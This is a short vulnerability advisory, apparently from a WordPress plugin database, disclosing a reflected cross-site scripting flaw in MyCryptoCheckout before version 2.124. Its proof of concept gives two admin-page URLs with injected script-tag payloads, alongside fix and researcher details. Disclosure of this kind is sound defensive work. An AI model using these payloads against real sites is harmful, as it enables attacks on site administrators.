WordPress Plugin Vulnerabilities

MyCryptoCheckout < 2.124 - Reflected XSS

Description

The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

Make a logged in admin open one of the URL below

v < 2.124- https://example.com/wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"><script>alert(/XSS/)</script> (will trigger when there is at least one Autosettlements)

v < 2.122 - https://example.com/wp-admin/options-general.php?page=mycryptocheckout&"><script>alert('XSS')</script>

Affects Plugins

Fixed in 2.124

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Pablo Sanchez
Submitter
Pablo Sanchez
Verified
Yes

Timeline

Publicly Published
2023-04-06 (about 1 years ago)
Added
2023-04-06 (about 1 years ago)
Last Updated
2023-04-06 (about 1 years ago)

Other